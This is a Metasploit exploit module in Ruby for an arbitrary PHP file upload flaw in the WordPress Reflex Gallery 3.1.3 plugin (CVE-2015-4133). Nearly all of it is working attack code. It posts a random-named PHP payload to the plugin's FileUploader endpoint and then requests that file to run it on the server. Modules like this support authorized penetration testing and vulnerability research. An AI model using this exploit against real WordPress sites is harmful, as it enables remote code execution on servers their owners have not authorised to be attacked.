##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wordpress Reflex Gallery Upload Vulnerability',
        'Description' => %q{
          This module exploits an arbitrary PHP code upload in the WordPress Reflex Gallery
          version 3.1.3. The vulnerability allows for arbitrary file upload and remote code execution.
        },
        'Author' => [
          'Unknown', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2015-4133'],
          ['EDB', '36374'],
          ['OSVDB', '88853'],
          ['WPVDB', '7867']
        ],
        'Privileged' => false,
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Targets' => [['Reflex Gallery 3.1.3', {}]],
        'DisclosureDate' => '2012-12-30', # OSVDB? EDB? WPVDB? Cannot set the date.
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    time = Time.new
    register_options(
      [
        OptString.new('UPLOAD_YEAR', [ false, 'Year to use in upload path', time.year.to_s]),
        OptString.new('UPLOAD_MONTH', [ false, 'Month to use in upload path', '%02d' % time.month]),
        OptString.new('PLUGIN_DIRECTORY_NAME', [ true, 'Name of the directory that contains the reflex-gallery plugin', 'reflex-gallery']),
      ]
    )
  end

  def plugin_dir
    datastore['PLUGIN_DIRECTORY_NAME']
  end

  def plugin_uri
    normalize_uri(wordpress_url_plugins, plugin_dir)
  end

  def check
    check_plugin_version_from_readme('reflex-gallery', '3.1.4')
  end

  def exploit
    php_pagename = rand_text_alpha(rand(8..15)) + '.php'

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
    post_data = data.to_s

    year = datastore['upload_year']
    month = datastore['upload_month']

    res = send_request_cgi({
      'uri' => normalize_uri(plugin_uri, 'admin', 'scripts', 'FileUploader', 'php.php'),
      'method' => 'POST',
      'vars_get' => {
        'Year' => year.to_s,
        'Month' => month.to_s
      },
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    })

    if res
      if res.code == 200 && res.body =~ /success|#{php_pagename}/
        print_good("Our payload is at: #{php_pagename}. Calling payload...")
        register_files_for_cleanup(php_pagename)
      elsif res.code == 200 && res.body.include?('does not exist')
        fail_with(Failure::Unknown, "#{peer} - Upload directory /#{year}/#{month} does not exist. Try setting them to an existing upload folder or emptying the variables to upload to the root upload folder")
      else
        fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status('Calling payload...')
    send_request_cgi(
      'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', year, month, php_pagename)
    )
  end
end
